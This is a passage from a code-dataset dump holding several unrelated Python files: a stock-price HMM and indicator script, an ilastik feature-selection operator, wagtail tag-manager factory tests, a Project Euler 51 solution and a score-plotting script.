plt.tight_layout()\n\n\ndef mean_confidence_interval(vals, confidence):\n a = 1.0 * np.array(vals)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m - h, m, m + h\n\ndef compare_hidden_states(hmm_model, cols_features, conf_interval, iters = 1000):\n plt.figure(figsize=(15, 15))\n fig, axs = plt.subplots(len(cols_features), hmm_model.n_components, figsize = (15, 15))\n colours = cm.prism(np.linspace(0, 1, hmm_model.n_components))\n \n for i in range(0, model.n_components):\n mc_df = pd.DataFrame()\n \n # Samples generation\n for j in range(0, iters):\n row = np.transpose(hmm_model._generate_sample_from_state(i))\n mc_df = mc_df.append(pd.DataFrame(row).T)\n mc_df.columns = cols_features\n \n for k in range(0, len(mc_df.columns)):\n axs[k][i].hist(mc_df[cols_features[k]], color = colours[i])\n axs[k][i].set_title(cols_features[k] + \" (state \" + str(i) + \"): \" + str(np.round(mean_confidence_interval(mc_df[cols_features[k]], conf_interval), 3)))\n axs[k][i].grid(True)\n \n plt.tight_layout()\n\n\n\n\n\n\n\n\nfor x in ticker:\n print(x)\n\n #datayahoo = pdr.get_data_yahoo(x, period = \"7d\", interval = \"1m\")\n datayahoo = pdr.get_data_yahoo(x, interval = \"1d\", start=\"1950-07-15\", end=\"2019-12-25\")\n\n datayahoo = datayahoo.reset_index()\n \n #datayahoo = datayahoo[:-10]\n\n #print(datayahoo) \n\n\n datayahooopen = datayahoo['Open'].values.tolist()\n datayahoohigh = datayahoo['High'].values.tolist() \n datayahoolow = datayahoo['Low'].values.tolist()\n datayahooclose = datayahoo['Close'].values.tolist()\n datayahoovolume = datayahoo['Volume'].values.tolist()\n\n data = pd.DataFrame(columns= ['Open', 'High', 'Low', 'Close', 'Volume'])\n\n\n #data['Timestamp'] = bdate + datayahoodate\n data['Open'] = datayahooopen\n data['High'] = datayahoohigh\n data['Low'] = datayahoolow\n data['Close'] = datayahooclose\n data['Volume'] = datayahoovolume\n \n \n price = data['Close']\n\n #data['Timestamp'] = pd.to_datetime(data['Timestamp'])\n data = data.drop_duplicates()\n\n\n price = price * 100000\n\n #price = price[:-24] \n\n \n\n max_idx = list(argrelextrema(price.values, np.greater, order=1)[0])\n min_idx = list(argrelextrema(price.values, np.less, order=1)[0]) \n\n idx = max_idx + min_idx\n\n\n idx.sort()\n\n current_idx = idx + [len(price.values) - 1] \n\n current_pat = price.values[current_idx]\n\n start = min(current_idx)\n end = max(current_idx)\n\n list_of_values = current_pat.tolist()\n\n df = pd.DataFrame({'Price':list_of_values})\n\n df1 = df\n\n try:\n model = get_best_hmm_model(X = df1, max_states = 10, max_iter = 1000000)\n except:\n print('means weight')\n\n print(\"Best model with {0} states \".format(str(model.n_components))) \n \n\n predictionDataset = df.iloc[-1:]\n\n prediction = model.predict(predictionDataset)\n\n # LOGIC SHORT WHEN 0; NO POSITION WHEN 1; LONG WHEN 2;\n print(x)\n #print(len(prediction))\n print(sum(prediction))\n\n\n\n\n datasetINDICATORS = pd.DataFrame(columns= ['Open', 'High', 'Low', 'Close', 'Volume'])\n\n #datasetINDICATORS['Timestamp'] = data['Datetime']\n datasetINDICATORS['Open'] = data['Open']\n datasetINDICATORS['High'] = data['High']\n datasetINDICATORS['Low'] = data['Low']\n datasetINDICATORS['Close'] = data['Close']\n datasetINDICATORS['Volume'] = data['Volume']\n\n # Add all ta features\n datasetINDICATORS = ta.add_all_ta_features(\n datasetINDICATORS, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\"\n )\n\n\n\n dataset = pd.DataFrame(columns= ['High', 'Low', 'Mid', 'Last', 'Volume']) #'Bid', 'Ask', \n\n dataset['Mid'] = datayahooopen\n dataset['High'] = datayahoohigh\n dataset['Low'] = datayahoolow\n dataset['Last'] = datayahooclose\n dataset['Volume'] = datayahoovolume\n\n dataset = dataset.drop_duplicates()\n\n # Feature params\n future_period = 6\n std_period = 10\n ma_period = 10\n price_deviation_period = 10\n volume_deviation_period = 10\n column_price = 'Last'\n column_high = 'High'\n column_low = 'Low'\n column_volume = 'Volume'\n\n\n # Create features\n ### CHANGES\n cols_features = [\n\n 'last_return', \n #'std_normalized',\n #'ma_ratio', \n #'price_deviation',\n #'volume_deviation',\n\n #'volume_obv',\n #'volume_cmf',\n #'volume_fi', MAYBE\n #'volume_em',\n #'volume_sma_em',\n #'volume_vpt',\n #'volume_nvi',\n 'volatility_atr',\n #'volatility_bbm',\n #'volatility_bbh',\n #'volatility_bbl',\n #'volatility_bbw',\n #'volatility_kcc',\n #'volatility_kch',\n #'volatility_kcl',\n #'volatility_dcl',\n #'volatility_dch',\n #'volatility_dchi',\n #'volatility_dcli',\n 'trend_macd',\n #'trend_macd_signal',\n #'trend_macd_diff',\n #'trend_ema_fast',\n #'trend_ema_slow',\n #'trend_adx',\n #'trend_adx_pos',\n #'trend_adx_neg',\n #'trend_vortex_ind_pos', \n #'trend_vortex_ind_neg',\n #'trend_vortex_ind_diff',\n #'trend_trix',\n #'trend_mass_index',\n #'trend_cci', MAYBE\n #'trend_dpo', \n #'trend_kst', \n #'trend_kst_sig',\n #'trend_kst_diff', \n #'trend_ichimoku_a', \n #'trend_ichimoku_b',\n #'trend_visual_ichimoku_a', \n #'trend_visual_ichimoku_b',\n #'trend_aroon_up',\n #'trend_aroon_down', \n #'trend_aroon_ind',\n\n #'trend_psar', \n #'trend_psar_up',\n #'trend_psar_down', \n #'trend_psar_up_indicator', \n #'trend_psar_down_indicator',\n #'momentum_rsi',\n #'momentum_mfi', MAYBE\n #'momentum_tsi', \n #'momentum_uo', \n 'momentum_stoch',\n #'momentum_stoch_signal', \n #'momentum_wr',\n #'momentum_ao',\n #'momentum_kama',\n #'momentum_roc', \n #'others_dr', \n #'others_dlr', \n #'others_cr', \n\n\n ]\n\n\n\n\n\n # Create features\n ### CHANGES\n cols_features_custom = [\n\n 'last_return', \n #'std_normalized',\n #'ma_ratio', \n #'price_deviation',\n #'volume_deviation',\n\n 'volume_obv',\n #'volume_cmf',\n #'volume_fi', MAYBE\n #'volume_em',\n #'volume_sma_em',\n #'volume_vpt',\n #'volume_nvi',\n #'volatility_atr',\n 'volatility_bbm',\n 'volatility_bbh',\n 'volatility_bbl',\n #'volatility_bbw',\n #'volatility_kcc',\n #'volatility_kch',\n #'volatility_kcl',\n #'volatility_dcl',\n #'volatility_dch',\n #'volatility_dchi',\n #'volatility_dcli',\n #'trend_macd',\n #'trend_macd_signal',\n #'trend_macd_diff',\n #'trend_ema_fast',\n #'trend_ema_slow',\n #'trend_adx',\n #'trend_adx_pos',\n #'trend_adx_neg',\n #'trend_vortex_ind_pos', \n #'trend_vortex_ind_neg',\n #'trend_vortex_ind_diff',\n #'trend_trix',\n #'trend_mass_index',\n #'trend_cci', MAYBE\n #'trend_dpo', \n #'trend_kst', \n #'trend_kst_sig',\n #'trend_kst_diff', \n 'trend_ichimoku_a', \n 'trend_ichimoku_b',\n #'trend_visual_ichimoku_a', \n #'trend_visual_ichimoku_b',\n #'trend_aroon_up',\n #'trend_aroon_down', \n #'trend_aroon_ind',\n\n #'trend_psar', \n #'trend_psar_up',\n #'trend_psar_down', \n #'trend_psar_up_indicator', \n #'trend_psar_down_indicator',\n 'momentum_rsi',\n #'momentum_mfi', MAYBE\n #'momentum_tsi', \n #'momentum_uo', \n #'momentum_stoch',\n #'momentum_stoch_signal', \n #'momentum_wr',\n #'momentum_ao',\n #'momentum_kama',\n #'momentum_roc', \n #'others_dr', \n #'others_dlr', \n #'others_cr', \n\n\n ]\n\n\n\n\n\n\n dataset['last_return'] = dataset[column_price].pct_change()\n dataset['std_normalized'] = dataset[column_price].rolling(std_period).apply(std_normalized)\n #dataset['ma_ratio'] = dataset[column_price].rolling(std_period).apply(ma_ratio) \n dataset['ma_ratio'] = dataset['Last']\n dataset['price_deviation'] = dataset['High'] - dataset['Low']\n dataset['volume_deviation'] = dataset['Volume']\n\n dataset[\"pivot_point\"] = (dataset['High'] + dataset['Low'] + dataset['Last']) / 3\n dataset[\"pivH1\"] = (2 * dataset[\"pivot_point\"]) - dataset['Low']\n dataset[\"pivL1\"] = (2 * dataset[\"pivot_point\"]) + dataset['High']\n dataset[\"pivH2\"] = dataset[\"pivot_point\"] + (dataset['High'] - dataset['Low'])\n dataset[\"pivL2\"] = dataset[\"pivot_point\"] - (dataset['High'] - dataset['Low'])\n dataset[\"pivH3\"] = dataset[\"High\"] + 2 * (dataset[\"pivot_point\"] - dataset['Low'])\n dataset[\"pivL3\"] = dataset[\"Low\"] - 2 * (dataset[\"High\"] - dataset[\"pivot_point\"])\n\n\n dataset['volume_obv'] = datasetINDICATORS['volume_obv']\n dataset['volume_cmf'] = datasetINDICATORS['volume_cmf']\n dataset['volume_fi'] = datasetINDICATORS['volume_fi']\n dataset['volume_em'] = datasetINDICATORS['volume_em']\n dataset['volume_sma_em'] = datasetINDICATORS['volume_sma_em']\n dataset['volume_vpt'] = datasetINDICATORS['volume_vpt']\n dataset['volume_nvi'] = datasetINDICATORS['volume_nvi']\n dataset['volatility_atr'] = datasetINDICATORS['volatility_atr']\n dataset['volatility_bbm'] = datasetINDICATORS['volatility_bbm']\n dataset['volatility_bbh'] = datasetINDICATORS['volatility_bbh']\n dataset['volatility_bbl'] = datasetINDICATORS['volatility_bbl']\n dataset['volatility_bbw'] = datasetINDICATORS['volatility_bbw']\n dataset['volatility_kcc'] = datasetINDICATORS['volatility_kcc']\n dataset['volatility_kch'] = datasetINDICATORS['volatility_kch']\n dataset['volatility_kcl'] = datasetINDICATORS['volatility_kcl']\n dataset['volatility_dcl'] = datasetINDICATORS['volatility_dcl']\n dataset['volatility_dch'] = datasetINDICATORS['volatility_dch']\n dataset['volatility_dchi'] = datasetINDICATORS['volatility_dchi']\n dataset['volatility_dcli'] = datasetINDICATORS['volatility_dcli']\n dataset['trend_macd'] = datasetINDICATORS['trend_macd']\n dataset['trend_macd_signal'] = datasetINDICATORS['trend_macd_signal']\n dataset['trend_macd_diff'] = datasetINDICATORS['trend_macd_diff']\n dataset['trend_ema_fast'] = datasetINDICATORS['trend_ema_fast']\n dataset['trend_ema_slow'] = datasetINDICATORS['trend_ema_slow']\n dataset['trend_adx'] = datasetINDICATORS['trend_adx']\n dataset['trend_adx_pos'] = datasetINDICATORS['trend_adx_pos']\n dataset['trend_adx_neg'] = datasetINDICATORS['trend_adx_neg']\n dataset['trend_vortex_ind_pos'] = datasetINDICATORS['trend_vortex_ind_pos'] \n dataset['trend_vortex_ind_neg'] = datasetINDICATORS['trend_vortex_ind_neg']\n dataset['trend_vortex_ind_diff'] = datasetINDICATORS['trend_vortex_ind_diff']\n dataset['trend_trix'] = datasetINDICATORS['trend_trix']\n dataset['trend_mass_index'] = datasetINDICATORS['trend_mass_index']\n dataset['trend_cci'] = datasetINDICATORS['trend_cci']\n dataset['trend_dpo'] = datasetINDICATORS['trend_dpo'] \n dataset['trend_kst'] = datasetINDICATORS['trend_kst'] \n dataset['trend_kst_sig'] = datasetINDICATORS['trend_kst_sig']\n dataset['trend_kst_diff'] = datasetINDICATORS['trend_kst_diff']\n dataset['trend_ichimoku_a'] = datasetINDICATORS['trend_ichimoku_a'] \n dataset['trend_ichimoku_b'] = datasetINDICATORS['trend_ichimoku_b']\n dataset['trend_visual_ichimoku_a'] = datasetINDICATORS['trend_visual_ichimoku_a'] \n dataset['trend_visual_ichimoku_b'] = datasetINDICATORS['trend_visual_ichimoku_b'] \n dataset['trend_aroon_up'] = datasetINDICATORS['trend_aroon_up']\n dataset['trend_aroon_down'] = datasetINDICATORS['trend_aroon_down'] \n dataset['trend_aroon_ind'] = datasetINDICATORS['trend_aroon_ind'] \n dataset['momentum_rsi'] = datasetINDICATORS['momentum_rsi']\n dataset['momentum_mfi'] = datasetINDICATORS['momentum_mfi']\n dataset['momentum_tsi'] = datasetINDICATORS['momentum_tsi'] \n dataset['momentum_uo'] = datasetINDICATORS['momentum_uo']\n dataset['momentum_stoch'] = datasetINDICATORS['momentum_stoch']\n dataset['momentum_stoch_signal'] = datasetINDICATORS['momentum_stoch_signal'] \n dataset['momentum_wr'] = datasetINDICATORS['momentum_wr']\n dataset['momentum_ao'] = datasetINDICATORS['momentum_ao']\n dataset['momentum_kama'] = datasetINDICATORS['momentum_kama']\n dataset['momentum_roc'] = datasetINDICATORS['momentum_roc'] \n dataset['others_dr'] = datasetINDICATORS['others_dr'] \n dataset['others_dlr'] = datasetINDICATORS['others_dlr'] \n dataset['others_cr'] = datasetINDICATORS['others_cr'] \n\n\n dataset[\"future_return\"] = dataset[column_price].pct_change(future_period).shift(-future_period)\n \n\n dataset = dataset.replace([np.inf, -np.inf], np.nan)\n\n train_set = dataset[cols_features]\n\n train_set = train_set.dropna()\n\n # Add the features we want to use\n\n dataset['close/pivH1'] = dataset['Last'] / dataset['pivH1']\n dataset['close/pivL1'] = dataset['Last'] / dataset['pivL1']\n\n dataset['close/pivH2'] = dataset['Last'] / dataset['pivH2']\n\n dataset['close/pivL2'] = dataset['Last'] / dataset['pivL2']\n\n\n dataset['close/pivH3'] = dataset['Last'] / dataset['pivH3']\n dataset['close/pivL3'] = dataset['Last'] / dataset['pivL3']\n\n dataset['pivL1/pivH1'] = dataset['pivL1'] / dataset['pivH1']\n dataset['pivL2/pivH2'] = dataset['pivL2'] / dataset['pivH2']\n\n dataset['high/pivH1'] = dataset['High'] / dataset['pivH1']\n dataset['low/pivH1'] = dataset['Low'] / dataset['pivH1']\n dataset['high/pivL1'] = dataset['High'] / dataset['pivL1']\n\n\n dataset['low/pivL1'] = dataset['Low'] / dataset['pivL1']\n\n dataset['close/prevClose'] = dataset['Last'] / dataset['Last'].shift(1)\n\n # Below are the things we are interested in predicting:\n\n dataset['next_candle_size'] = abs(dataset['Last'].shift(-1) - dataset['Last']) / dataset['Last']\n\n # Result is -1, 1, or 0 at the mo - its not binary!! So we just want to know if it is 1 or 0\n\n dataset['next_candle_color'] = np.where(dataset['Last'].shift(-1) > dataset['Last'], 1, -1)\n\n #data = dataset[['Date', 'Mid', 'High', 'Low', 'Last', 'close/prevClose','low/pivL1', 'close/pivH3',\n # 'close/pivH1', 'close/pivL2', 'close/pivL1', 'close/pivH2', 'high/pivL1', 'close/pivL3', \n # 'low/pivH1', 'pivL2/pivH2', 'high/pivH1', 'next_candle_color', 'next_candle_size'\n # ]]\n\n data = dataset[['Mid', 'High', 'Low', 'Last', 'close/prevClose','low/pivL1', 'close/pivH3',\n 'close/pivH1', 'close/pivL2', 'close/pivL1', 'close/pivH2', 'high/pivL1', 'close/pivL3', \n 'low/pivH1', 'pivL2/pivH2', 'high/pivH1', 'next_candle_color', 'next_candle_size'\n ]]\n\n data = data.dropna()\n\n\n # XG Classify\n trainning_data = data\n\n df_xg = trainning_data\n\n df_xg.dropna(axis=0, inplace=True)\n\n X = df_xg.iloc[:,5:17]\n y = df_xg.iloc[:,-2]\n\n params = {\n 'objective': 'binary:logistic',\n 'max_depth': 2,\n 'learning_rate': 1,\n 'silent': 1,\n 'n_estimators': 5\n }\n \n\n\n\n #model_two = XGBClassifier(**params).fit(X, y)\n\n #predictionDataset_xg = X.iloc[-1:]\n \n #prediction_xg = model_two.predict(predictionDataset_xg)\n\n #print('PRINT XG CLASSIFIER')\n #print(prediction_xg)\n ####################################\n\n #try:\n # model = get_best_hmm_model(X = train_set, max_states = 10, max_iter = 1000000)\n #except:\n # print('means weight')\n\n #print(\"Best model with {0} states \".format(str(model.n_components)))\n\n #plot_hidden_states(model, dataset.reset_index(), train_set, column_price)\n #compare_hidden_states(hmm_model=model, cols_features=cols_features, conf_interval=0.95)\n\n \n\n #predictionDataset = dataset.iloc[-1:]\n\n #prediction = model.predict(predictionDataset[cols_features])\n\n #print('SIRAJ CLASSIFIER')\n # LOGIC SHORT WHEN 0; NO POSITION WHEN 1; LONG WHEN 2;\n #print(len(prediction))\n #print(sum(prediction))\n\n\n","sub_path":"Bet-folder/SANDP500.py","file_name":"SANDP500.py","file_ext":"py","file_size_in_byte":22526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"79151539","text":"from lazyflow.graph import Operator, InputSlot, OutputSlot\n\nfrom lazyflow.operators import OpPixelFeaturesPresmoothed, OpSlicedBlockedArrayCache, OpMultiArraySlicer2\n\nclass OpFeatureSelection(Operator):\n \"\"\"\n The top-level operator for the feature selection applet.\n \"\"\"\n name = \"OpFeatureSelection\"\n category = \"Top-level\"\n\n # Multiple input images\n InputImage = InputSlot()\n\n # The following input slots are applied uniformly to all input images\n Scales = InputSlot() # The list of possible scales to use when computing features\n FeatureIds = InputSlot() # The list of features to compute\n SelectionMatrix = InputSlot() # A matrix of bools indicating which features to output.\n # The matrix rows correspond to feature types in the order specified by the FeatureIds input.\n # (See OpPixelFeaturesPresmoothed for the available feature types.)\n # The matrix columns correspond to the scales provided in the Scales input,\n # which requires that the number of matrix columns must match len(Scales.value)\n \n # Features are presented in the channels of the output image\n # Output can be optionally accessed via an internal cache.\n # (Training a classifier benefits from caching, but predicting with an existing classifier does not.)\n OutputImage = OutputSlot()\n CachedOutputImage = OutputSlot()\n\n FeatureLayers = OutputSlot(level=1) # For the GUI, we also provide each feature as a separate slot in this multislot\n \n def __init__(self, *args, **kwargs):\n super(OpFeatureSelection, self).__init__(*args, **kwargs)\n\n # Two internal operators: features and cache\n self.opPixelFeatures = OpPixelFeaturesPresmoothed(parent=self)\n self.opPixelFeatureCache = OpSlicedBlockedArrayCache(parent=self)\n self.opPixelFeatureCache.name = \"opPixelFeatureCache\"\n\n # Connect the cache to the feature output\n self.opPixelFeatureCache.Input.connect(self.opPixelFeatures.Output)\n self.opPixelFeatureCache.fixAtCurrent.setValue(False)\n\n # Connect our internal operators to our external inputs \n self.opPixelFeatures.Scales.connect( self.Scales )\n self.opPixelFeatures.FeatureIds.connect( self.FeatureIds )\n self.opPixelFeatures.Matrix.connect( self.SelectionMatrix )\n self.opPixelFeatures.Input.connect( self.InputImage )\n \n # Connect our external outputs to our internal operators\n self.OutputImage.connect( self.opPixelFeatures.Output )\n self.CachedOutputImage.connect( self.opPixelFeatureCache.Output )\n self.FeatureLayers.connect( self.opPixelFeatures.Features )\n\n def setupOutputs(self): \n # We choose block shapes that have only 1 channel because the channels may be \n # coming from different features (e.g different filters) and probably shouldn't be cached together.\n blockDimsX = { 't' : (1,1),\n 'z' : (128,256),\n 'y' : (128,256),\n 'x' : (32,32),\n 'c' : (1000,1000) } # Overestimate number of feature channels: Cache block dimensions will be clipped to the size of the actual feature image\n\n blockDimsY = { 't' : (1,1),\n 'z' : (128,256),\n 'y' : (32,32),\n 'x' : (128,256),\n 'c' : (1000,1000) }\n\n blockDimsZ = { 't' : (1,1),\n 'z' : (32,32),\n 'y' : (128,256),\n 'x' : (128,256),\n 'c' : (1000,1000) }\n \n axisOrder = [ tag.key for tag in self.InputImage.meta.axistags ]\n innerBlockShapeX = tuple( blockDimsX[k][0] for k in axisOrder )\n outerBlockShapeX = tuple( blockDimsX[k][1] for k in axisOrder )\n\n innerBlockShapeY = tuple( blockDimsY[k][0] for k in axisOrder )\n outerBlockShapeY = tuple( blockDimsY[k][1] for k in axisOrder )\n\n innerBlockShapeZ = tuple( blockDimsZ[k][0] for k in axisOrder )\n outerBlockShapeZ = tuple( blockDimsZ[k][1] for k in axisOrder )\n\n # Configure the cache \n self.opPixelFeatureCache.innerBlockShape.setValue( (innerBlockShapeX, innerBlockShapeY, innerBlockShapeZ) )\n self.opPixelFeatureCache.outerBlockShape.setValue( (outerBlockShapeX, outerBlockShapeY, outerBlockShapeZ) )\n\n\n def propagateDirty(self, slot, subindex, roi):\n # Output slots are directly connected to internal operators\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ilastik/applets/featureSelection/opFeatureSelection.py","file_name":"opFeatureSelection.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"413287819","text":"import pytest\n\nfrom tests.factories.tag import (\n TagFactory,\n tag_lazy_traceable,\n tag_lazy_analytical,\n tag_lazy_functional,\n tag_instant_traceable,\n tag_instant_analytical,\n tag_instant_functional,\n)\nfrom tests.factories.trigger import TriggerFactory, TriggerConditionFactory\nfrom tests.factories.constant import ConstantFactory\nfrom tests.factories.variable import VariableFactory\nfrom wagtail_tag_manager.models import (\n Tag,\n Trigger,\n Constant,\n Variable,\n TriggerCondition,\n)\n\n\ndef get_expected_content(string):\n return f''\n\n\n@pytest.mark.django_db\ndef test_tag_create():\n produced_tag = TagFactory()\n tag = Tag(\n name=\"functional instant\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_functional():\n produced_tag = tag_instant_functional()\n tag = Tag(\n name=\"functional instant\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_analytical():\n produced_tag = tag_instant_analytical()\n tag = Tag(\n name=\"analytical instant\",\n tag_type=\"analytical\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_instant_traceable():\n produced_tag = tag_instant_traceable()\n tag = Tag(\n name=\"traceable instant\",\n tag_type=\"traceable\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_functional():\n produced_tag = tag_lazy_functional()\n tag = Tag(\n name=\"functional lazy\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_analytical():\n produced_tag = tag_lazy_analytical()\n tag = Tag(\n name=\"analytical lazy\",\n tag_type=\"analytical\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_tag_lazy_traceable():\n produced_tag = tag_lazy_traceable()\n tag = Tag(\n name=\"traceable lazy\",\n tag_type=\"traceable\",\n content='',\n )\n\n assert produced_tag.name == tag.name\n assert produced_tag.tag_type == tag.tag_type\n assert produced_tag.content == get_expected_content(tag.name)\n\n\n@pytest.mark.django_db\ndef test_constant_create():\n produced_constant = ConstantFactory()\n constant = Constant(name=\"Constant\", key=\"key\", value=\"value\")\n\n assert produced_constant.name == constant.name\n assert produced_constant.key == constant.key\n assert produced_constant.value == constant.value\n\n\n@pytest.mark.django_db\ndef test_variable_create():\n produced_variable = VariableFactory()\n variable = Variable(\n name=\"Variable\", key=\"key\", variable_type=\"_cookie+\", value=\"wtm\"\n )\n\n assert produced_variable.name == variable.name\n assert produced_variable.key == variable.key\n assert produced_variable.variable_type == variable.variable_type\n assert produced_variable.value == variable.value\n\n\n@pytest.mark.django_db\ndef test_trigger_create():\n produced_trigger = TriggerFactory()\n trigger = Trigger(name=\"Trigger\")\n\n assert produced_trigger.name == trigger.name\n\n\n@pytest.mark.django_db\ndef test_trigger_condition_create():\n produced_trigger = TriggerFactory()\n produced_trigger_condition = TriggerConditionFactory(trigger=produced_trigger)\n trigger = Trigger(name=\"Trigger\")\n trigger_condition = TriggerCondition(\n variable=\"navigation_path\", value=\"/\", trigger=trigger\n )\n\n assert produced_trigger.name == trigger.name\n assert produced_trigger_condition.value == trigger_condition.value\n","sub_path":"tests/unit/test_factories.py","file_name":"test_factories.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"472449696","text":"# By replacing the 1st digit of the 2-digit number *3, \n# it turns out that six of the nine possible values: 13, 23, 43, 53, 73, and 83, are all prime.\n\n# By replacing the 3rd and 4th digits of 56**3 with the same digit, \n# this 5-digit number is the first example having seven primes among the ten \n# generated numbers, yielding the family: 56003, 56113, 56333, 56443, 56663, 56773, \n# and 56993. Consequently 56003, being the first member of this family, is the smallest prime \n# with this property.\n\n# Find the smallest prime which, by replacing part of the number \n# (not necessarily adjacent digits) with the same digit, \n# is part of an eight prime value family.\n\n############\n# Solution #\n############\n\n# Stupid solution incoming!\n\nimport math\n\ndef genPatternsRecursive(patterns, base, length):\n\tif len(base) == length:\n\t\treturn\n\tnew_base_a = base[:] + \"*\"\n\tnew_base_b = base[:] + \"_\"\n\tif len(new_base_a) == length:\n\t\tpatterns.append(new_base_a)\n\t\tpatterns.append(new_base_b)\n\t\treturn\n\telse:\n\t\tgenPatternsRecursive(patterns, new_base_a, length)\n\t\tgenPatternsRecursive(patterns, new_base_b, length)\n\n# Generates a list of patterns of the form \"_**_\" or \"*_*_*_\"\n# of a given length\ndef genPatterns(length):\n\tbase = \"\"\n\tpatterns = []\n\tgenPatternsRecursive(patterns, base, length)\n\treturn patterns\n\n# Takes a pattern (e.g. \"_**_\") and a list of digits\n# (e.g. [1, 2, 2, 3]), and returns true if the stars\n# in the pattern are occupied by the same digit.\n# Also return a code to identify the family (e.g. \"1**3\" reversed)\ndef patternMatch(pattern, digits):\n\treplacement = -1\n\tcode = \"\"\n\tfor i in range(len(digits)):\n\t\tif pattern[i] == '_':\n\t\t\tcode += str(digits[i])\n\t\t\tcontinue\n\t\tcode += '*'\n\t\tif replacement == -1:\n\t\t\treplacement = digits[i]\n\t\telif digits[i] != replacement:\n\t\t\treturn (False, \"\")\n\treturn (True, code)\n\ndef getDigits(n):\n\tdigits = []\n\twhile n > 0:\n\t\tdigits.append(n % 10)\n\t\tn = n // 10\n\treturn digits\n\ndef isPrime(n):\n\t# Ignore multiples of two\n\tfor i in range(3, int(math.sqrt(n)) + 1, 2):\n\t\tif n % i == 0:\n\t\t\treturn False\n\treturn True\n\n# Generate patterns for i-digit numbers\nfamilies = []\nfor i in range(1, 8):\n\tfamilies.append(genPatterns(i))\n\n# Go through each prime, find out what families it belongs to,\n# and add one to each family's score\nscores = {}\nfor n in range(3, 1000000, 2):\n\tif not isPrime(n):\n\t\tcontinue\n\tdigits = getDigits(n)\n\tpatterns = families[len(digits) - 1]\n\tfor pattern in patterns:\n\t\tmatch, code = patternMatch(pattern, digits)\n\t\tif match:\n\t\t\tif code in scores:\n\t\t\t\tscores[code][1] += 1 # increment the score\n\t\t\telse:\n\t\t\t\tscores[code] = [n, 1] # n was the first prime\n\n# Find the first family with a score >= 8\nfor code, (first, score) in scores.items():\n\tif score >= 8:\n\t\tprint(first)\n\t\tbreak","sub_path":"problem51.py","file_name":"problem51.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"573075743","text":"import pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\ndef get_contract_data(contract):\n plot_dict = {}\n plot_dict['axaie'] = [50.0,60.0,150.0]\n plot_dict['autoline'] = [1000.0,200.0,150.0]\n return plot_dict[contract]\ndef get_percentile(x):\n percentile_dict = {}\n x.sort()\n n = len(x)\n percentile = 0.95\n x_95_percentile = int(percentile*n + 0.5)\n median = int(0.5*n + 0.5)\n q1 = int(0.25*n + 0.5)\n q3 = int(0.75*n + 0.5)\n x_5 = int(0.05*n+0.5)\n x_10 = int(0.1*n+0.5)\n x_90 = int(0.9*n+0.5)\n percentile_dict['95'] = x[x_95_percentile]\n percentile_dict['50'] = x[median]\n percentile_dict['25'] = x[q1]\n percentile_dict['75'] = x[q3]\n percentile_dict['5'] = x[x_5]\n percentile_dict['10'] = x[x_10]\n percentile_dict['90'] = x[x_90]\n return percentile_dict \ndef get_data(sav_file):\n pkl_file = open(sav_file, 'rb')\n data = pickle.load(pkl_file)\n return data\n\ndef get_differences(old,new):\n data = {}\n for subid in old:\n if subid in new:\n for h in [7,28,90]:\n if len(new[subid][h])*len(old[subid][h])!= 0:\n if subid not in data:\n data[subid] = {}\n if str(new[subid][h][0])!=\"nan\":\n data[subid][h] = (float(new[subid][h][0])-float(old[subid][h][0]))\n result = {}\n for subid in data:\n for h in data[subid]:\n if h not in result:\n result[h] = []\n result[h].append(data[subid][h])\n return result \ndef plot_data(plotting_subid):\n contract = 'axaie'\n min_var1 = -100.0\n max_var1 = 100.0\n plotting_text = get_contract_data(contract)\n counter = 1\n numbins = np.arange(min_var1,max_var1,(max_var1-min_var1)/200.0 ) \n for days_of_chaining in [7,28,90]:\n plot_data = plotting_subid[days_of_chaining]\n number_of_drivers = len(plot_data)\n median = get_percentile(np.array(plot_data))\n plt.subplot(3,1,counter)\n if counter==1:\n plt.title('Lifesense analysis for 7,28,90 days chaining')\n plt.hist(plot_data,bins=numbins,color='c',label=\"{0}-days chaining\".format(days_of_chaining))\n plt.axvline(median['5'], color='b', linestyle='dashed', linewidth=2)\n plt.text(median['5'],plotting_text[counter-1],'95%:{0}'.format(round(median['5'],2)),rotation=90)\n plt.axvline(median['10'], color='r', linestyle='dashed', linewidth=2)\n plt.text(median['10'],plotting_text[counter-1],'90%:{0}'.format(round(median['10'],2)),rotation=90)\n plt.xlim(min_var1,max_var1)\n plt.xlabel('%Chaining_distance')\n plt.ylabel('Count')\n plt.legend(loc=0)\n counter+=1\n\n plt.show()\n\nsav_file_old_method = '../sav_files/score_correlation/axaie_percentagese_for_correlation_with_production.sav'\nsav_file_new_method = 